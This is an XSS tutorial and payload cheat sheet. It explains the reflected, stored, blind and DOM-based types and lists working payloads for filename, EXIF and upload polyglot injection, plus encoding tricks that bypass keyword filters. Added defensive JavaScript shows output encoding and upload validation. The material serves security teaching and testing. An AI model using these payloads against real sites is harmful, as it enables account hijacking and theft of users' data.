
Cross-site scripting (XSS)

Concept

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Types of XSS

  • Reflected cross-site scripting

  • Stored cross-site scripting (blind XSS is a variant of stored XSS)

  • Document Object Model (DOM)-based cross-site scripting

Reflected Cross-Site Scripting

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. The payload travels in the victim's own request, so the attacker has to deliver it, typically as a crafted link or a form the victim is tricked into submitting, and each victim has to be targeted individually.

Stored Cross-Site Scripting

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. Unlike reflected XSS, the payload does not travel in the victim's own request: it is written into the application's data store (a comment, a profile field, an uploaded filename) and delivered to every user whose page later renders that record. The attacker therefore submits the payload once and waits for victims, which is why sites that publish user-supplied content (blogs, forums, social networks) are the usual targets. The server itself is not "infected" in any meaningful sense: it faithfully stores and returns the string, and it is the browser of each viewer that executes it.

Blind Cross-Site Scripting

Blind XSS vulnerabilities are a variant of persistent XSS. They occur when the attacker's input is stored by the application and later executed in a part of it the attacker cannot see, or in a different application altogether. For example, an attacker injects a payload into a contact or feedback form, and the payload fires when an administrator reviews the feedback entries in the back office. The input can just as well execute in a completely separate internal application, such as one where administrators review access logs or application exceptions. Because the attacker never sees the page that renders the payload, the payload has to report back on its own (typically by loading a resource from a server the attacker controls), which is what the blind-XSS tooling in the Tools section provides.

Document Object Model-based Cross-Site Scripting

DOM-based XSS vulnerabilities usually arise when client-side JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution or HTML parsing, such as eval() or innerHTML. The vulnerable code runs entirely in the browser, so when the source is the URL fragment the payload never reaches the server and is invisible to server-side filters and logs. Exploitation lets an attacker execute arbitrary JavaScript in the victim's session, which typically allows them to hijack the victim's account.
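The stored and reflected cases above come down to one thing: an untrusted string is concatenated into HTML without being encoded for the context it lands in. The following is an added example (not code from the original page) that reproduces the stored-XSS condition with an in-memory comment feed, shows the vulnerable renderer beside the fixed one, and uses a small start-tag scanner to show what a browser would actually execute. Function names (postComment, renderCommentsSafe, isExploitable) and the attacker strings are constructed for the demo.

```javascript
// Added example (not code from the original page): a tiny comment feed that
// reproduces the stored/reflected XSS condition described above and its fix.
// Function names are hypothetical; the attacker strings are constructed.

// Output encoding for the two HTML contexts used below: text nodes and
// double-quoted attribute values. Other contexts (URL, JavaScript, CSS) need
// their own encoders; this one is not sufficient for them.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The "database": input accepted in one request is rendered in every later
// response, which is what makes the bug stored (second-order) rather than reflected.
const comments = [];
function postComment(author, body) {
  comments.push({ author, body }); // stored verbatim; the fix does not belong in the storage layer
}

// Vulnerable renderer: stored strings are concatenated straight into markup.
function renderCommentsVulnerable() {
  return comments
    .map((c) => `<div class="comment" data-author="${c.author}">${c.body}</div>`)
    .join('\n');
}

// Fixed renderer: every untrusted value is encoded for the context it lands in.
function renderCommentsSafe() {
  return comments
    .map((c) => `<div class="comment" data-author="${escapeHtml(c.author)}">${escapeHtml(c.body)}</div>`)
    .join('\n');
}

// Minimal start-tag scanner that honours quoted attribute values, roughly as
// the HTML tokenizer does. A plain substring search for "onerror=" would
// wrongly flag the escaped output, where that text sits inside a quoted value.
function listStartTags(html) {
  const tagRe = /<([a-zA-Z][\w-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
  const attrRe = /([^\s"'>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const tags = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = [];
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(m[2])) !== null) attrs.push(a[1].toLowerCase());
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// True if the markup contains a script element or any on* event-handler
// attribute, i.e. something that runs when the page is viewed.
function isExploitable(html) {
  return listStartTags(html).some(
    (t) => t.name === 'script' || t.attrs.some((a) => a.startsWith('on')),
  );
}

// Constructed attacker input: a tag-injection payload in the body, then an
// attribute-breakout and an attribute-injection payload in the author field.
postComment('alice', 'hello');
postComment('mallory', '<svg onload=alert(document.domain)>');
postComment('"><img src=x onerror=alert(document.cookie)>', 'nice post');
postComment('x" onmouseover="alert(1)', 'see you');
```

The same rule applies on the client for the DOM-based case: data from location.hash or location.search goes into textContent or setAttribute, never into innerHTML or eval(). The scanner here is only a demonstration oracle; in a real test the browser's parser is the judge.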

XSS via file upload payloads

XSS in a filename

This fires wherever the application writes the uploaded filename into HTML without encoding it (upload confirmation page, file listing, error message):

```html
"><img src=v onerror=prompt(xss);>.jpeg
```

Metadata (exiftool)

An image with the payload in an EXIF field. It only fires if the application later renders that metadata field (here Artist) into a page without encoding it:

```shell
exiftool -Artist='"><img src=1 onerror=alert(document.domain)>' brute.jpeg
```

SVG content XSS (save the content below as an SVG file)

Script in an SVG runs only when the file is opened as a document (navigated to directly, or embedded with <object> or <iframe>) and served as image/svg+xml; an SVG referenced from an <img> tag does not execute script.

```html
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
```

GIF extension XSS (save the content below as a GIF file)

This is a GIF/JavaScript/HTML polyglot: the GIF89a magic bytes satisfy a signature check, while the rest of the file is a valid script (a comment, then an assignment whose right-hand side calls alert) and also contains an <svg> tag. It fires only if the file is later executed as a script or parsed as HTML, which depends on the Content-Type the server attaches when it serves the file back; it does nothing when displayed as an image, and current browsers refuse to run a script served as image/gif.

```
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
```

HTML extension (save the content below as an HTML file)

Fires if the uploaded file is served back from the application's own origin with an HTML content type (or with no type and sniffing enabled):

```html
<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body>
<script type="text/javascript">alert(document.cookie)</script>
<script>prompt(1);</script>
</body>
</html>
```

PDF extension

  • Use when the upload check looks only at the extension and the leading magic bytes and not at the content type: the file starts with a valid PDF header and the HTML payload sits inside the body. Whether it fires depends on how the file is served back (an HTML or sniffable response), not on the PDF viewer.

```
%PDF-1.4
%äüöß
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
%% compressed stream bytes (unreadable in the original listing)
<img src=x onerror=alert(document.cookie)>
```
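Every upload trick above relies on the server trusting something the client controls: the filename, the declared content type, or a signature check that looks at the first few bytes only. The following is an added example (not code from the original page) of the server-side checks that close those gaps: filename sanitisation, an extension allowlist tied to magic bytes and to the declared type, a markup heuristic for the SVG/HTML/GIF/PDF polyglots, and fixed response headers for serving files back. Function names (sanitizeFilename, validateUpload, serveHeaders) are hypothetical and the sample files are constructed inline to mirror the payloads listed above.

```javascript
// Added example, not code from the original page: server-side handling of the
// upload tricks above (filename injection, SVG/HTML/GIF/PDF payloads). All
// function names are hypothetical; the sample files are constructed inline.

// Types the server is willing to store. The Content-Type it serves comes from
// this table, never from the client's declared type or from the file contents.
const ALLOWED = [
  { ext: 'jpg',  type: 'image/jpeg',      magic: [0xff, 0xd8, 0xff] },
  { ext: 'jpeg', type: 'image/jpeg',      magic: [0xff, 0xd8, 0xff] },
  { ext: 'png',  type: 'image/png',       magic: [0x89, 0x50, 0x4e, 0x47] },
  { ext: 'gif',  type: 'image/gif',       magic: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
  { ext: 'pdf',  type: 'application/pdf', magic: [0x25, 0x50, 0x44, 0x46] }, // "%PDF"
];

// Drop any path component and everything outside a conservative character set,
// so a name like `"><img src=v onerror=...>.jpeg` cannot break out of the markup
// that later displays it. (Output encoding at display time is still required.)
function sanitizeFilename(name) {
  const base = String(name).replace(/^.*[\\/]/, '');
  const clean = base.replace(/[^a-z0-9._-]/gi, '_').replace(/^\.+/, '');
  return clean || 'upload';
}

function extensionOf(name) {
  const m = /\.([a-z0-9]+)$/i.exec(name);
  return m ? m[1].toLowerCase() : '';
}

// Magic-byte sniffing: which allowed type do the leading bytes claim to be?
function sniffType(bytes) {
  return ALLOWED.find((t) => t.magic.every((b, i) => bytes[i] === b)) || null;
}

// Polyglot detection: the SVG, HTML and GIF89a/* ... */ payloads above all carry
// markup in the body, which a genuine raster image or PDF never does. This is a
// heuristic; re-encoding images through an image library is the stronger control.
function looksLikeMarkup(bytes) {
  const head = bytes.toString('latin1', 0, 4096);
  return /<\s*(svg|script|html|!doctype|iframe|img|object)\b/i.test(head);
}

// Returns { ok: true, storedName, headers } or { ok: false, reason }.
function validateUpload({ filename, declaredType, bytes }) {
  const storedName = sanitizeFilename(filename);
  const ext = extensionOf(storedName);
  const entry = ALLOWED.find((t) => t.ext === ext);
  if (!entry) return { ok: false, reason: 'extension not allowed' };
  const sniffed = sniffType(bytes);
  if (!sniffed || sniffed.type !== entry.type) return { ok: false, reason: 'content does not match extension' };
  if (declaredType !== entry.type) return { ok: false, reason: 'declared content-type mismatch' };
  if (looksLikeMarkup(bytes)) return { ok: false, reason: 'embedded markup' };
  return { ok: true, storedName, headers: serveHeaders(entry, storedName) };
}

// Headers for serving the stored file back: fixed type, no sniffing, and
// non-image types forced to download rather than rendered in the origin.
function serveHeaders(entry, storedName) {
  const inline = entry.type.startsWith('image/');
  return {
    'Content-Type': entry.type,
    'X-Content-Type-Options': 'nosniff',
    'Content-Disposition': inline ? 'inline' : `attachment; filename="${storedName}"`,
    'Content-Security-Policy': 'sandbox',
  };
}

// Constructed sample files mirroring the payloads listed above.
const SAMPLES = {
  realJpeg: Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00]),
  svg: Buffer.from('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>', 'latin1'),
  gifPolyglot: Buffer.from('GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;', 'latin1'),
  pdfPolyglot: Buffer.from('%PDF-1.4\n2 0 obj\n<</Length 3 0 R>>\nstream\n<img src=x onerror=alert(document.cookie)>\n', 'latin1'),
  cleanPdf: Buffer.from('%PDF-1.4\n1 0 obj\n<</Type/Catalog>>\nendobj\n', 'latin1'),
};
```

Serving uploads from a separate origin (a dedicated static domain) is the control that makes the remaining cases moot: even an HTML file that slips through then executes in an origin that holds none of the application's cookies or DOM.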

Payloads

Bypassing a first-pass filter (whitespace, separator and encoding variations)

These work against filters that match fixed strings such as "onload=" or "alert": the HTML tokenizer tolerates whitespace, slashes and other separators around an attribute name, and JavaScript accepts Unicode escapes in identifiers and hex or octal escapes inside string literals (hence the eval() variants). Several entries rely on parsing quirks of specific, often older, browsers, so confirm each one against the target browser.

```html
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg%09onload=alert(1)>
<svg onload%09=alert(1)>
<svg%09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror="\u0061lert(1)"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>
```

When the "javascript" keyword is blocked

Case changes, HTML character references for the colon or for letters of the scheme, and data: URLs all defeat a literal match on "javascript:", because the HTML parser decodes character references in attribute values before the URL is ever parsed. These entries are browser-dependent: current versions of the major browsers generally refuse javascript: URLs as <object> data and load data: URLs into an opaque origin that cannot read the embedding page's cookies or DOM, so they mainly serve to test the filter itself or legacy targets. The same encodings apply to href and src attributes.

```html
<object data="JaVaScRiPt:alert(1)">
<object data="javascript&colon;alert(1)">
<object data="java &#x20;&#x20;script:alert(1)">
<object data="javascript&#x003A;alert(1)">
<object data="javascript&#58;alert(1)">
<object data="&#x6A;avascript:alert(1)">
<object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
```
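What both payload lists exploit is the gap between the raw parameter a filter inspects and the string a browser ends up acting on, after percent-decoding, HTML character-reference decoding, data: URL decoding and JavaScript escape resolution. The following is an added example (not code from the original page) that applies a typical first-pass rule set to the page's own payloads twice: once to the raw input, as a naive filter does, and once after a browser-like normalisation. Function names (normalise, evades) and the RULES set are hypothetical; the payloads are taken from the lists above.

```javascript
// Added example (not code from the original page): why substring filters miss
// the payloads listed above, and what a browser-like normalisation of the input
// looks like. Function names are hypothetical; the payloads are the page's own.

// Rules a typical first-pass filter applies to the raw request parameter.
const RULES = {
  handler: /<[a-z][^>]*[\s\/]on[a-z]+\s*=/i, // any on* attribute inside a tag
  scheme: /javascript\s*:/i,                  // javascript: URL
  script: /<script/i,                          // script element
  alert: /\balert\s*\(/i,                      // the demo's "dangerous function"
};

// Step 1: percent-decoding, as the server's parameter parsing would do.
function percentDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

// Step 2: HTML character references, which the HTML parser resolves inside
// attribute values before the URL parser or the script engine sees them.
const NAMED_REFS = { colon: ':', tab: '\t', newline: '\n', lt: '<', gt: '>', amp: '&', quot: '"' };
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return NAMED_REFS[name.toLowerCase()] ?? m;
  });
}

// Step 3: base64 data: URLs, which carry an entire document in one attribute.
function decodeDataUrls(s) {
  return s.replace(/data:[^;,"']*;base64,([A-Za-z0-9+\/=]+)/gi,
    (_m, b64) => Buffer.from(b64, 'base64').toString('latin1'));
}

// Step 4: JavaScript escapes (\u0061, \x61 and \141 all spell "a").
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})|\\x([0-9a-f]{2})|\\([0-7]{1,3})/gi, (_m, u, x, o) => {
    if (u) return String.fromCharCode(parseInt(u, 16));
    if (x) return String.fromCharCode(parseInt(x, 16));
    return String.fromCharCode(parseInt(o, 8));
  });
}

function normalise(input) {
  return decodeJsEscapes(decodeDataUrls(decodeEntities(percentDecode(input))));
}

// Compare what the naive filter sees with what a browser effectively sees.
function evades(payload, rule) {
  return { naive: rule.test(payload), normalised: rule.test(normalise(payload)) };
}

// Payloads from the lists above (backslashes doubled so they stay literal).
const PAYLOADS = {
  tabBeforeEquals: '<svg onload%09=alert(1)>',
  colonEntity: '<object data="javascript&colon;alert(1)">',
  hexEntity: '<object data="&#x6A;avascript:alert(1)">',
  unicodeEscape: '<script>\\u0061lert(1)</script>',
  octalEscape: '<img src=x onerror="eval(\'\\141lert(1)\')"/>',
  base64DataUrl: '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
};
```

Even the normalised filter is only a detector for testing; it stays one decoding layer behind whatever the next payload uses (the "java &#x20;&#x20;script:" entry, for instance, is not caught because a real URL parser would not accept it either). The durable fix is the one the page's definitions imply: encode output for its context, or run user HTML through a parsing sanitiser with an allowlist.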

Tools

The best tool for blind XSS: has 2FA, e-mail reports and a share-reports feature

Knoxss

Automation XSS